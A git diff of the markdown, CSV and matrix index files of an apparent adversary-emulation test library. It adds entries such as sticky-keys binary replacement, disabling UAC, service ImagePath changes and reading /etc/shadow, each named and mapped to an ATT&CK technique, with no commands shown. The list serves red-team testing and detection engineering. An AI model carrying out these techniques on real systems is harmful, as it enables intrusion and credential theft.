@@ -205,6 +209,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - Execute arbitrary PowerShell code,d590097e-d402-44e2-ad72-2c6aa1ce78b1,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt 
@@ -222,12 +227,14 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt -defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +persistence,T1546.008,Accessibility Features,2,Replace binary of sticky 
keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt @@ -252,6 +259,7 @@ persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GU persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt +persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt 
@@ -275,6 +283,7 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell persistence,T1505.002,Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell 
@@ -371,6 +380,7 @@ discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall R discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt +discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1033,System Owner/User Discovery,1,System Owner/User Discovery,4c4959bf-addf-4b4a-be86-8d09cc1857aa,command_prompt 
@@ -518,5 +528,6 @@ lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Man lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 4c2c3367..a26388e2 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -7,6 +7,7 @@ - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] 
@@ -31,6 +32,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -43,7 +45,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) @@ -137,6 +140,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] - Atomic Test #2: Set a SetUID flag on file [macos, linux] 
@@ -179,6 +183,7 @@ - Atomic Test #2: Add command to .bashrc [macos, linux] - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] @@ -225,7 +230,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows] - [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md) @@ -242,7 +248,8 @@ - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) 
@@ -326,6 +333,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - Atomic Test #1: Shortcut Modification [windows] - Atomic Test #2: Create shortcut to cmd in startup folders [windows] @@ -355,7 +363,9 @@ - Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows] # credential-access -- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) + - Atomic Test #1: Access /etc/shadow (Local) [linux] + - Atomic Test #2: Access /etc/passwd (Local) [linux] - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -475,6 +485,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] 
@@ -771,6 +782,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] - Atomic Test #2: Set a SetUID flag on file [macos, linux] @@ -831,7 +843,8 @@ - Atomic Test #1: Take ownership using takeown utility [windows] - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows] - Atomic Test #3: attrib - Remove read-only attribute [windows] - - Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] + - Atomic Test #4: attrib - hide file [windows] + - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] - [T1220 XSL Script Processing](../../T1220/T1220.md) - Atomic Test #1: MSXSL Bypass using local files [windows] - Atomic Test #2: MSXSL Bypass using remote files [windows] @@ -1025,6 +1038,7 @@ - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #5: List Open Egress Ports [windows] - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows] + - Atomic Test #7: Qakbot Recon [windows] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] 
@@ -1055,7 +1069,8 @@ - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md) - Atomic Test #1: Execute Commands [windows] - Atomic Test #2: Execute PowerShell script via Word DDE [windows] @@ -1338,7 +1353,8 @@ - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 371ac144..282b47c5 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md 
@@ -11,7 +11,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -65,7 +66,8 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -107,7 +109,9 @@ - T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) # credential-access -- T1003.008 /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) + - Atomic Test #1: Access /etc/shadow (Local) [linux] + - Atomic Test #2: Access /etc/passwd (Local) [linux] - [T1552.003 Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -470,7 +474,8 @@ - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index c87678bc..052b2df9 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md 
@@ -9,7 +9,7 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -70,7 +70,7 @@ - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -321,7 +321,7 @@ - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux] - - Atomic Test #2: Cron - Add script to cron folder [macos, linux] + - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] - T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 52d124a7..d4e1343a 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -4,6 +4,7 @@ - T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md) - Atomic Test #1: Install AppInit Shim [windows] @@ -26,6 +27,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -101,6 +103,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - Atomic Test #1: Shortcut Modification [windows] - Atomic Test #2: Create shortcut to cmd in startup folders [windows] 
@@ -142,6 +145,7 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] + - Atomic Test #8: Disable UAC using reg.exe [windows] - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] @@ -361,6 +365,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md) - Atomic Test #1: mavinject - Inject DLL into running process [windows] - Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows] @@ -398,7 +403,8 @@ - Atomic Test #1: Take ownership using takeown utility [windows] - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows] - Atomic Test #3: attrib - Remove read-only attribute [windows] - - Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] + - Atomic Test #4: attrib - hide file [windows] + - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] - [T1220 XSL Script Processing](../../T1220/T1220.md) - Atomic Test #1: MSXSL Bypass using local files [windows] - Atomic Test #2: MSXSL Bypass using remote files [windows] 
@@ -408,6 +414,7 @@ # persistence - [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md) - Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows] + - Atomic Test #2: Replace binary of sticky keys [windows] - [T1098 Account Manipulation](../../T1098/T1098.md) - Atomic Test #1: Admin Account Manipulate [windows] - Atomic Test #2: Domain Account and Group Manipulate [windows] @@ -459,7 +466,8 @@ - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md) @@ -516,6 +524,7 @@ - T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) - Atomic Test #1: Service Registry Permissions Weakness [windows] + - Atomic Test #2: Service ImagePath Change with reg.exe [windows] - [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md) - Atomic Test #1: Shortcut Modification [windows] - Atomic Test #2: Create shortcut to cmd in startup folders [windows] 
@@ -676,6 +685,7 @@ - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #5: List Open Egress Ports [windows] - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows] + - Atomic Test #7: Qakbot Recon [windows] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] @@ -1017,7 +1027,8 @@ - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1133 External Remote Services](../../T1133/T1133.md) + - Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows] - T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 88055df9..24b3b88f 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
@@ -1,7 +1,7 @@ # Linux Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A 
